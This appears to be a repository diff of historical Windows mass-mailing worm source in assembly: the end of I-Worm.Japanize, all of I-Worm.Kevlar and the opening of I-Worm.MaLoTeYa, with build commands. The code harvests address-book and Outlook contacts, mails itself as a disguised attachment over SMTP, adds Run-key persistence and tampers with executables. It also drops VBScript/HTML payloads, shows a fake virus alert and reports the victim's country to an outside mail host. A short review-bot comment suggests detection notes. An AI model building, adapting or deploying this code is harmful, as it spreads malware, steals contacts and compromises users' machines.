smtp_BODY_TO db CRLF,'TO: '
len_smtp_BODY_TO = $ - ofs smtp_BODY_TO
smtp_BODY_SUBJECT db CRLF,'SUBJECT: Important',CRLF
len_smtp_BODY_SUBJECT = $ - ofs smtp_BODY_SUBJECT
smtp_DOT_CRLF db '.',CRLF
len_smtp_DOT_CRLF = $ - ofs smtp_DOT_CRLF
smtp_QUIT db 'QUIT',CRLF
len_smtp_QUIT = $ - ofs smtp_QUIT
smtp_crlf db CRLF
smtp_MIME_h db 'MIME-Version: 1.0',CRLF
db 'Content-Type: multipart/mixed; boundary="Boundary-a8dfidaoRadvfuck"',CRLF
db CRLF
db '--Boundary-a8dfidaoRadvfuck',CRLF
db 'Content-Type: text/plain; charset=iso-2022-jp',CRLF
db 'Content-Transfer-Encoding: 7bit',CRLF
db 'Content-Description: Mail message body',CRLF
db CRLF
db CRLF ; text
db CRLF
db '--Boundary-a8dfidaoRadvfuck',CRLF
db 'Content-Type: application/x-msdownload; name="patch.exe"',CRLF
db 'Content-Disposition: attachment; filename="patch.exe"',CRLF
db 'Content-Transfer-Encoding: BASE64',CRLF
db CRLF
len_smtp_MIME_h = $ - ofs smtp_MIME_h
;; base64 body
smtp_MIME_e db CRLF,'--Boundary-a8dfidaoRadvfuck--',CRLF,CRLF
len_smtp_MIME_e = $ - ofs smtp_MIME_e
r_seed dd 10987293h ; random seed
smtp_jsubject_1 db CRLF,'SUBJECT: =?ISO-2022-JP?B?'
len_smtp_jsubject_1 = $ - ofs smtp_jsubject_1
smtp_jsubject_2 db '?=',CRLF
len_smtp_jsubject_2 = $ - ofs smtp_jsubject_2
;;; japanese subjects table
japanese_subjects label byte
dd ofs js_01
dd ofs js_02
dd ofs js_03
dd ofs js_04
dd ofs js_05
dd ofs js_06
dd ofs js_07
dd ofs js_08
dd ofs js_09
dd ofs js_10
dd ofs js_11
dd ofs js_12
dd ofs js_13
dd ofs js_14
dd ofs js_15
dd ofs js_16
dd ofs js_17
num_of_jsub = ($ - ofs japanese_subjects)/4
js_01 db 'GyRCPUVNVxsoQg==',0 ; 重要
js_02 db 'UmU6GyRCPUVNVxsoQg==',0; Re:重要
js_03 db 'GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; 重要なお知らせ
js_04 db 'UmU6GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; Re:重要なおしらせ
js_05 db 'GyRCTmMkTjdvGyhC',0 ; 例の件
js_06 db 'UmU6GyRCTmMkTjdvGyhC',0; Re:例の件
js_07 db 'GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; お久しぶりです
js_08 db 'UmU6GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; Re:お久しぶりです
js_09 db 'GyRCJDMkcyRLJEEkTxsoQg==',0; こんにちは
js_10 db 'UmU6GyRCJDMkcyRLJEEkTxsoQg==',0; Re:こんにちは
js_11 db 'GyRCNktIaxsoQg==',0 ; 極秘
js_12 db 'UmU6GyRCNktIaxsoQg==',0; Re:極秘
js_13 db 'GyRCO3FOQRsoQg==',0 ; 資料
js_14 db 'UmU6GyRCO3FOQRsoQg==',0; Re:資料
js_15 db 'GyRCMz8bKEI=',0 ; ウソコ
js_16 db 'GyRCJSYlYxsoQlI=',0 ; ウソコ
js_17 db 'GyRCJCYkcyQzGyhC',0 ; うんこ
.code
start:
callW GetTickCount
mov dwo [r_seed],eax
jmp @@go
;; signature :)
db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0
db 'XXXXX I-Worm.Japanize XXXXX',0
db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0
@@go:
call get_some_info
push ofs buffer
push 0101h
callW WSAStartup
test eax,eax
jnz exit
call open_wab
test eax,eax
jnz clean_sock
call create_base64enc
call spread
free_mem:
push dwo [ptr_base64buf]
callW GlobalUnlock
push dwo [hmemout]
callW GlobalFree
close_wab4:
push dwo [hwab4file]
push dwo [hwab4map]
push dwo [hwab4mapview]
callW CloseHandle
callW CloseHandle
callW CloseHandle
clean_sock:
callW WSACleanup
exit:
push 0
callW ExitProcess
spread:
;; lifewire ;)
mov esi,dwo [hwab4mapview]
mov ecx,[esi+64h] ; num of addr
jecxz @@exit
add esi,[esi+60h] ; ptr to addr
@@spread_loop:
push ecx
mov eax,esi
cmp by [esi+1],0
jne @@nounicode
push esi
lea edi,target_mailaddr
push edi
push 48h
pop ecx
@@1:
lodsw
stosb
loop @@1
pop eax
pop esi
add esi,20h
@@nounicode:
call spread2
add esi,24h
pop ecx
loop @@spread_loop
@@exit:
ret
spread2:
push esi
mov esi,eax ; now esi=email addr
push 0
push 1
push 2
callW socket
mov dwo [sock],eax
mov wo [sin_family],AF_INET
mov ax,25
xchg al,ah
mov wo [sin_port],ax
push ofs SMTP_Server
callW gethostbyname
test eax,eax
jz @@exit
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
mov dwo [sin_addr],eax
push len_sockaddr_in
lea eax,sockaddr_in
push eax
push dwo [sock]
callW connect
test eax,eax
jnz @@exit
call sendmail
@@exit:
pop esi
ret
;;; ---
;;; reg stuff
get_some_info:
xor ebx,ebx
push ofs hReg
push 1
push ebx
push ofs str_SMInternetAccountManager
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error
push ofs bufsiz_accountidx
push ofs AccountIdx
push ebx
push ebx
push ofs str_DMA
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push dwo [hReg]
callW RegCloseKey
push ofs hReg
push 1
push ebx
push ofs str_SMIAccounts
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error
push ofs bufsiz_SMTPSERVER
push ofs SMTP_Server
push ebx
push ebx
push ofs str_SMTPNAME
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push ofs bufsiz_morons_mailaddr
push ofs morons_Mailaddr
push ebx
push ebx
push ofs str_SMTPEmailAddr
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push dwo [hReg]
callW RegCloseKey
push ofs hReg
push 1
push ebx
push ofs str_SMWab4
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error
push ofs bufsiz_wab4_path
push ofs wab4_path
push ebx
push ebx
push ebx
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push dwo [hReg]
callW RegCloseKey
xor eax,eax
ret
@@error:
xor eax,eax
dec eax
ret
open_wab:
xor ebx,ebx
push ebx
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push ebx
push FILE_SHARE_WRITE
push GENERIC_READ
push ofs wab4_path
callW CreateFileA
inc eax
jz @@error
dec eax
mov dwo [hwab4file],eax
push ebx
push ebx
push ebx
push PAGE_READONLY
push ebx
push eax
callW CreateFileMappingA
mov dwo [hwab4map],eax
push ebx
push ebx
push ebx
push FILE_MAP_READ
push eax
callW MapViewOfFile
mov dwo [hwab4mapview],eax
xor eax,eax
ret
@@error:
xor eax,eax
dec eax
ret
create_base64enc:
push 260
push ofs myfilename
push 0
callW GetModuleFileNameA
xor ebx,ebx
push ebx
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push ebx
push FILE_SHARE_READ
push GENERIC_READ
push ofs myfilename
callW CreateFileA
inc eax
jz @@error
dec eax
mov dwo [hmyfile],eax
push 0
push dwo [hmyfile]
callW GetFileSize
mov dwo [fsize],eax
add eax,100h
push eax
push GHND
callW GlobalAlloc
mov dwo [hmemout0],eax
push eax
callW GlobalLock
mov dwo [ptr_myself],eax
push 0
push ofs recv_buffer
push dwo [fsize]
push eax
push dwo [hmyfile]
callW ReadFile
test eax,eax
jz @@eexit
push 0
push dwo [hmyfile]
callW GetFileSize
push eax ; save size
shl eax,1 ; eax*2
push eax
push GHND
callW GlobalAlloc
mov dwo [hmemout],eax
push eax
callW GlobalLock
mov dwo [ptr_base64buf],eax
; pop ebx ; restore size
; push ebx ; size
push eax
push dwo [ptr_myself]
call base64encode
push dwo [hmyfile]
callW CloseHandle
push dwo [ptr_myself]
callW GlobalUnlock
push dwo [hmemout0]
callW GlobalFree
xor eax,eax
ret
@@eexit:
push dwo [hmyfile]
callW CloseHandle
push dwo [ptr_myself]
callW GlobalUnlock
push dwo [hmemout0]
callW GlobalFree
@@error:
xor eax,eax
dec eax
ret
base64encode proc pascal
arg @@src
arg @@dest
arg @@srclen
mov esi,dwo [@@src]
mov edi,dwo [@@dest]
@@b64loop:
xor eax,eax
cmp dwo [@@srclen],1
jne @@srclen2
lodsb
push 2
pop ecx
mov edx,03D3Dh ; ==
dec dwo [@@srclen]
jmp @@b64next
@@srclen2:
cmp dwo [@@srclen],2
jne @@srclen3
lodsw
push 3
pop ecx
push 03dh
pop edx
sub dwo [@@srclen],2
jmp @@b64next
@@srclen3:
lodsd
push 4
pop ecx
xor edx,edx
dec esi
sub dwo [@@srclen],3
@@b64next:
bswap eax
@@b64n_loop:
mov ebx,eax
and eax,0FC000000h
rol eax,6
mov al,[@@b64table + eax]
stosb
mov eax,ebx
shl eax,6
dec ecx
jnz @@b64n_loop
cmp dwo [@@srclen],0
ja @@b64loop
mov eax,edx
stosd
ret
@@b64table db "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
endp
g_send:
;; in
;; ecx = size
;; esi = ptr to data
;; out
;; eax = ret value of send()
push 0
push ecx
push esi
push dwo [sock]
callW send
ret
g_recv:
;; out
;; error -> eax=-1 success -> eax = 0
@@again:
push 0
push 1024
push ofs recv_buffer
push dwo [sock]
callW recv
inc eax
jz @@recv_error
cmp eax,1024
jz @@again
xor eax,eax
ret
@@recv_error:
xor eax,eax
dec eax
ret
sendmail:
;; yea. lame routine ;)
push esi ; mail addr
mov dwo [jflag],0 ; flag for .jp
;;
call g_recv
;;
lea esi,smtp_HELO
mov ecx,len_smtp_HELO
call g_send
call g_recv
;;
lea esi,smtp_MAIL_FROM
mov ecx,len_smtp_MAIL_FROM
call g_send
push ofs morons_Mailaddr
callW lstrlen
mov ecx,eax
lea esi,morons_Mailaddr
call g_send
mov ecx,2
lea esi,smtp_crlf
call g_send
call g_recv
;;
mov ecx,len_smtp_RCPT_TO
lea esi,smtp_RCPT_TO
call g_send
pop esi
push esi
push esi
callW lstrlen
push eax ; save
mov ecx,eax
call g_send
mov ecx,2
lea esi,smtp_crlf
call g_send
call g_recv
;; .jp?
pop eax ; len of mail address
pop esi
push esi ; mail address
add esi,eax
sub esi,3
cmp dwo [esi],00706a2eh ; .jp?
jne @@1
inc dwo [jflag]
@@1:
;;
lea esi,smtp_DATA
mov ecx,len_smtp_DATA
call g_send
call g_recv
;;
lea esi,smtp_BODY_FROM
mov ecx,len_smtp_BODY_FROM
call g_send
push ofs morons_Mailaddr
callW lstrlen
mov ecx,eax
lea esi,morons_Mailaddr
call g_send
lea esi,smtp_BODY_TO
mov ecx,len_smtp_BODY_TO
call g_send
pop esi
push esi
push esi
callW lstrlen
mov ecx,eax
call g_send
cmp dwo [jflag],0
jnz @@jsubject
mov ecx,len_smtp_BODY_SUBJECT
lea esi,smtp_BODY_SUBJECT
call g_send
jmp @@body
@@jsubject:
;; gen subject
mov ecx,len_smtp_jsubject_1
lea esi,smtp_jsubject_1
call g_send
mov esi,(num_of_jsub-1)
call rng
lea esi,japanese_subjects
mov esi,dwo [esi+eax*4]
push esi
callW lstrlen
mov ecx,eax
call g_send
mov ecx,len_smtp_jsubject_2
lea esi,smtp_jsubject_2
call g_send
@@body:
lea esi,smtp_MIME_h
mov ecx,len_smtp_MIME_h
call g_send
mov esi,dwo [ptr_base64buf]
push esi
push esi
callW lstrlen
pop esi
mov ecx,eax
call g_send
lea esi,smtp_MIME_e
mov ecx,len_smtp_MIME_e
call g_send
mov ecx,len_smtp_DOT_CRLF
lea esi,smtp_DOT_CRLF
call g_send
call g_recv
;;
mov ecx,len_smtp_QUIT
lea esi,smtp_QUIT
call g_send
call g_recv
pop esi
ret
rng:
;; in
;; esi = range
;; out
;; eax = random number
rdtsc
xor eax,edx
imul eax,dwo [r_seed]
dec eax
mov dwo [r_seed],eax
xor edx,edx
div esi
mov eax,edx
ret
end start
*************************************************************************
@ECHO OFF
TASM32 /ml /m /z japanize.asm,japanize.obj
TLINK32 -x -aa -Tpe japanize.obj,,,%import32.lib
DEL *.OBJ
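Review bot: The offsets `[esi+64h]` and `[esi+60h]` in `spread` carry only the inline `; num of addr` / `; ptr to addr` comments, stated as fact, and the copied TrendMicro text in the header says nothing about the WAB file layout; a hedged comment such as `; assumes WAB4 header: +60h = offset of entry table, +64h = entry count, 24h-byte stride - unverified against the on-disk format` would stop an analyst from treating the layout as established. The fixed SMTP strings the engine emits (`HELO localhost`, the `Boundary-a8dfidaoRadvfuck` MIME boundary, `SUBJECT: Important`, attachment name `patch.exe`) are the stable network-detectable content here and belong in the file header as such, next to the registry values it reads (`Default Mail Account`, `SMTP Server`, `SMTP Email Address`, `WAB4\Wab File Name`). `sendmail`'s only comment is `;; yea. lame routine ;)`; replacing it with a short summary of the SMTP exchange it performs (greeting, envelope, DATA with the MIME body, QUIT) would make the protocol flow readable without tracing every `g_send`/`g_recv` pair.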

651
Win32/I-Worm.Kevlar.asm Normal file

@ -0,0 +1,651 @@
comment #
Name : I-Worm.Kevlar
Author : PetiK
Date : August 7th 2001 - August 16th 2001
Size : 5120 byte
Action : Copy itself to %System%\Kevlar32.exe hidden attribute
%System%\MScfg32.exe normal attribute
Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System%\Kevlar32.exe
* Infect %Windir%\C???????.exe file on writing as "PetiK" in the file
* Infect %Windir%\*.exe It add .htm and create a new file with ActiveX
* Create C:\__.vbs This filetake all address in th e Address Book at save them in the
%windir%\AddBook.txt. The worm scan this file to find the address and send a new mail :
Subject : Windows Protect !!
Body : The smallest software to stop your computer to bug in each time.
I have found this program on WWW.KEVLAR-PROTECT.COM
Take a look at the attchment.
Bye and have a nice day.
Attachment : MScfg32.exe
* It creates the %windir%\MSinfo32.txt. I look like this :
[File Infected] => Name of C???????.exe file infected
CLEANMGR.EXE=Infected by W32.Kevlar.PetiK
CVTAPLOG.EXE=Infected by W32.Kevlar.PetiK
[EMail saved] => Some address found in the address book
first@mail.com=Next victim
second@mail.com=Next victim
To build the worm:
tasm32 /M /ML Kevlar
tlink32 -Tpe -aa -x Kevlar,,,import32
upx -9 Kevlar.exe
To delete the worm:
@echo off
del %windir%\system\Kevlar32.exe
del %windir%\system\MScfg32.exe
del %windir%\*.exe.htm
del %windir%\MSinfo32.txt
del %windir%\AddBook.txt
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
F_NAME: push 50
mov esi,offset Orig
push esi
push 0
callx GetModuleFileNameA
mov edi,offset CopyName2
push edi
push 50
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,'cSM\'
stosd
mov eax,'23gf'
stosd
mov eax,'exe.'
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
mov edi,offset CopyName
push edi
push 50
push edi
callx GetSystemDirectoryA
add edi,eax
mov al,'\'
stosb
mov eax,'lveK'
stosd
mov eax,'23ra'
stosd
mov eax,'exe.'
stosd
pop edi
push esi
callx GetFileAttributesA
cmp eax,1
je SUITE
push 0
push edi
push esi
callx CopyFileA
push 01h
push edi
callx SetFileAttributesA
REG: pushad
@pushsz "SHLWAPI.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov edi,eax
@pushsz "SHSetValueA"
push edi
callx GetProcAddress
test eax,eax
jz FIN
mov esi,eax
push 08h
push offset CopyName
push 01h
@pushsz "Kevlar32"
@pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
call esi
push edi
callx FreeLibrary
popad
call Nick
mov edi,offset nickname
push 40h
@pushsz "Hello, my name is :"
push edi
push 0
callx MessageBoxA
call Infect
jmp FIN
SUITE: call Infect2
VB_F: pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\__.vbs"
callx CreateFileA
test eax,eax
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\__.vbs"
callx WinExec
push 10000
callx Sleep
@pushsz "C:\__.vbs"
callx DeleteFileA
SCAN1: mov edi,offset addbook
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"ddA\"
stosd
mov eax,"kooB"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd
call OPEN
FIN: push 00h
callx ExitProcess
Nick Proc
mov edi,offset nickname
callx GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
name_g:
push ecx
callx GetTickCount
push 'Z'-'A'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'A'
stosb
callx GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
callx Sleep
pop ecx
loop name_g
ret
Nick EndP
Infect Proc
pushad
push 50
push offset WinPath
callx GetWindowsDirectoryA
push offset WinPath
callx SetCurrentDirectoryA
FFF:
push offset Search
@pushsz "C???????.exe"
callx FindFirstFileA
inc eax
je F_INF
dec eax
mov [exeHdl],eax
I_FILE:
mov verif,0
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset Search.cFileName
callx CreateFileA
inc eax
jz FNF
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
jz CL1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 06h
push ebp
callx MapViewOfFile
test eax,eax
jz CL2
xchg eax,edi
mov esi,eax
cmp word ptr [esi],"ZM"
jne CL2
cmp byte ptr [esi+18h],"@"
jne CL2
cmp word ptr [esi+80h],"EP"
jne CL2
cmp byte ptr [esi+12h],"P"
je CL2
mov word ptr [esi+12h],"eP"
mov word ptr [esi+14h],"it"
mov byte ptr [esi+16h],"K"
inc verif
push edi
callx UnmapViewOfFile
CL2:
push ebp
callx CloseHandle
CL1:
push ebx
callx CloseHandle
cmp verif,1
jne FNF
mov edi,offset InfoFile
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,'iSM\'
stosd
mov eax,'3ofn'
stosd
mov eax,'xt.2'
stosd
mov al,'t'
stosb
pop edi
mov esi,edi
push esi
@pushsz "Infected by W32.Kevlar.PetiK"
push offset Search.cFileName
@pushsz "File Infected"
callx WritePrivateProfileStringA
FNF:
push offset Search
push [exeHdl]
callx FindNextFileA
test eax,eax
jne I_FILE
FC:
push [exeHdl]
callx FindClose
F_INF:
popad
ret
Infect EndP
Infect2 Proc
pushad
push 50
push offset WinPath
callx GetWindowsDirectoryA
push offset WinPath
callx SetCurrentDirectoryA
FFF2:
push offset Search
@pushsz "*.exe"
callx FindFirstFileA
inc eax
je F_INF2
dec eax
mov [exeHdl],eax
I_FILE2:
pushad
mov edi,offset Search.cFileName
push edi
callx lstrlen
add edi,eax
mov eax,"mth."
stosd
xor eax,eax
stosd
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset Search.cFileName
callx CreateFileA
test eax,eax
xchg ebp,eax
push 00h
push offset octets
push HTMSIZE
push offset htmd
push ebp
callx WriteFile
push ebp
callx CloseHandle
popad
FNF2:
push offset Search
push [exeHdl]
callx FindNextFileA
test eax,eax
jne I_FILE2
FC2:
push [exeHdl]
callx FindClose
F_INF2:
popad
ret
Infect2 EndP
OPEN: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset addbook
callx CreateFileA
inc eax
je NO
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
cmp eax,03h
jbe F3 ; is the file empty ??
call SCAN
F3: push esi
callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
NO: popad
ret
SCAN:
pushad
xor edx,edx
mov edi,offset m_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"!"
je f_mail
cmp al,"@"
je not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je SCAN
call SEND_MAIL
jmp SCAN
entr2: xor al,al
stosb
pop edi
jmp SCAN
f_mail: popad
ret
SEND_MAIL:
push 50
push offset save_addr
callx GetWindowsDirectoryA
@pushsz "\MSinfo32.txt"
push offset save_addr
callx lstrcat
push offset save_addr
@pushsz "Next victim"
push offset m_addr
@pushsz "EMail saved"
callx WritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIHdl]
callx MAPISendMail
ret
.data
; ===== INSTALLATION =====
Orig db 50 dup (0)
CopyName db 50 dup (0)
CopyName2 db 50 dup (0)
nickname db 11 dup (?)
; ===== INFECTION =====
InfoFile db 50 dup (0)
WinPath db 50 dup (0)
exeHdl dd ?
verif dd ?
octets dd ?
; ===== MAIL =====
addbook db 50 dup (0)
save_addr db 50 dup (0)
m_addr db 128 dup (?)
MAPIHdl dd 0
subject db "Windows Protect !!",00h
body db "The smallest software to stop your computer to bug in each time.",0dh,0ah
db "I have found this program on WWW.KEVLAR-PROTECT.COM",0dh,0ah,0dh,0ah
db "Take a look at the attchment.",0dh,0ah,0dh,0ah
db 09h,09h,"Bye and have a nice day.",00h
NameFrom db "Your friend",00h
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd NameFrom
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset m_addr
dd offset m_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset CopyName2
dd ?
dd ?
htmd:
db '<html><head><title>PetiKVX come back</title></head><body>',0dh,0ah
db '<script language=vbscript>',0dh,0ah
db 'on error resume next',0dh,0ah
db 'set fso=createobject("scripting.filesystemobject")',0dh,0ah
db 'If err.number=429 then',0dh,0ah
db 'document.write "<font face=''verdana'' size=''2'' color=''#FF0000''>'
db 'You need ActiveX enabled to see this file<br><a href=''javascript:location.reload()''>'
db 'Click Here</a> to reload and click Yes</font>"',0dh,0ah
db 'Else',0dh,0ah
db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
db 'document.write "<font face=''verdana'' size=''3'' color=red>'
db 'This page is generate by a worm<br>But this worm is proteced by Kevlar<br></font>"',0dh,0ah
db 'document.write "<font face=''verdana'' size=''2'' color=blue><br>'
db 'Worms are not dangerous for your computer but to survive, they must be strong</font>"',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.avp.ch"',0dh,0ah
db 'End If',0dh,0ah
db '</script></html>',00h
HTMSIZE = $-htmd
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah
db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah
db 'c.Close',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'c.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
db 'c.WriteLine "!"',0dh,0ah
db 'c.Close',0dh,0ah
VBSSIZE = $-vbsd
signature db "I-Worm.Kevlar coded by PetiK (c)2001",00h
MAX_PATH equ 260
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
Search WIN32_FIND_DATA <>
end DEBUT
end

2048
Win32/I-Worm.M4&VR.asm Normal file


754
Win32/I-Worm.MaLoTeYa.asm Normal file

@ -0,0 +1,754 @@
comment #
Name : I-Worm.MaLoTeYa
Author : PetiK
Date : July 2nd - July 6th
Size : 12288 byte
Action: It copies itself to \WINDOWS\RUNW32.EXE and to \WINDOWS\SYSTEM\MSVA.EXE. It alters the
run= line and creates the VARegistered.htm file in the StartUp folder. This file send some
informations to petik@multimania.com and displays a fake message.
If the version of the platform is Windows 95/98, the file is a service process.
It infects all *.htm and *.html file while writing at the end a VB script. It checks after
if exist a internet connection and scans all *.htm* files in the "Temporary Internet Files"
to find some EMail addreses and send a copy of itself. The worms sends equally an email to
"petik@multimania.com" with the country of the user. When the user want to see the
system properties, the title of the window is changed by "PetiK always is with you :-)".
Greets to Benny, ZeMacroKiller98, Mandragore.
tasm32 /M /ML Maloteya
tlink32 -Tpe -aa -x Maloteya,,,import32
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
;----------------------------------------
;Installation of the worm in the computer
;----------------------------------------
DEBUT:
VERIF: push 00h
callx GetModuleFileNameA
push 50h
push offset szOrig
push eax
callx GetModuleFileNameA
push 50h
push offset szCopie
callx GetWindowsDirectoryA
@pushsz "\RUNW32.EXE"
push offset szCopie
callx lstrcat
push 50h
push offset szCopb
callx GetSystemDirectoryA
@pushsz "\MSVA.EXE"
push offset szCopb
callx lstrcat
push offset szOrig
push offset szCopie
callx lstrcmp
test eax,eax
jz CACHE
COPIE: push 00h
push offset szCopie
push offset szOrig
callx CopyFileA
push 00h
push offset szCopb
push offset szOrig
callx CopyFileA
WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA
;--------------------------------------------------
;Create VARegistered.htm file in the StartUp folder
;--------------------------------------------------
C_GET: @pushsz "SHELL32.dll"
callx LoadLibraryA
mov SHELLhdl,eax
@pushsz "SHGetSpecialFolderPathA"
push SHELLhdl
callx GetProcAddress
mov getfolder,eax
push 00h
push 07h ; STARTUP Folder
push offset StartUp
push 00h
call [getfolder]
test eax,eax
je F_HTM
@pushsz "\VARegistered.htm"
push offset StartUp
callx lstrcat
HTM: push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset StartUp
callx CreateFileA
mov [FileHdl],eax
push 00h
push offset octets
push HTMTAILLE
push offset htmd
push [FileHdl]
callx WriteFile
push [FileHdl]
callx CloseHandle
F_HTM: push [SHELLhdl]
callx FreeLibrary
F_MESS: push 1000
callx Sleep
push 1040h
@pushsz "Microsoft Virus Alert"
@pushsz "Your system does not appear infected with I-Worm.Magistr"
push 00h
callx MessageBoxA
jmp FIN
;----------------------------------
;Serivice process for Windows 95/98
;----------------------------------
CACHE: @pushsz "KERNEL32.dll"
callx GetModuleHandleA
@pushsz "RegisterServiceProcess"
push eax
callx GetProcAddress
xchg ecx,eax
jecxz D_INF
push 01h
push 00h
call ecx
D_INF: push 50
push offset szCurrent
callx GetCurrentDirectoryA
push offset szCurrent
callx SetCurrentDirectoryA
;---------------------------------------------
;Infect all *.htm* files of the Windows folder
;---------------------------------------------
FFF: push offset Search
@pushsz "*.htm*" ; Search some *.htm* files...
callx FindFirstFileA
inc eax
je F_INF
dec eax
mov [htmlHdl],eax
i_file: call infect ; and infect them
push offset Search
push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
push [htmlHdl]
callx FindClose
F_INF:
;-----------------------
; Check if we r conected
;-----------------------
NET1: @pushsz "WININET.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov WNEThdl,eax
@pushsz "InternetGetConnectedState"
push WNEThdl
callx GetProcAddress
test eax,eax
jz FIN
mov netcheck,eax
jmp NET2
NET2: push 00h
push offset Temp
call [netcheck] ; Connect to Internet ??
dec eax
jnz NET2
FINNET: push [WNEThdl]
callx FreeLibrary
PAYS: push 50
push offset szSystemini
callx GetWindowsDirectoryA
@pushsz "\Win.ini"
push offset szSystemini
callx lstrcat
push offset szSystemini
push 20
push offset org_pays
push offset Default
@pushsz "sCountry"
@pushsz "intl"
callx GetPrivateProfileStringA
;------------------------------------------------------------------
; Send the name of country to "petik@multomania.com" (perhaps bugs)
;------------------------------------------------------------------
SMTP: push offset WSA_Data ; Winsock
push 0101h ; ver 1.1 (W95+)
callx WSAStartup
or eax,eax
jnz INIT
@pushsz "obelisk.mpt.com.uk"
callx gethostbyname ; convert SMTP Name to an IP address
xchg ecx,eax
jecxz FREE_WIN ; Error ?
mov esi,[ecx+12] ; Fetch IP address
lodsd
push eax
pop [ServIP]
push 00h ; Create Socket
push 01h ; SOCK_STREAM
push 02h ; AF_INET
callx socket
mov work_socket,eax
inc eax
jz FREE_WIN
push 16 ; Sze of connect strucure
call @1 ; Connect structure
dw 2 ; Family
db 0, 25 ; Port number
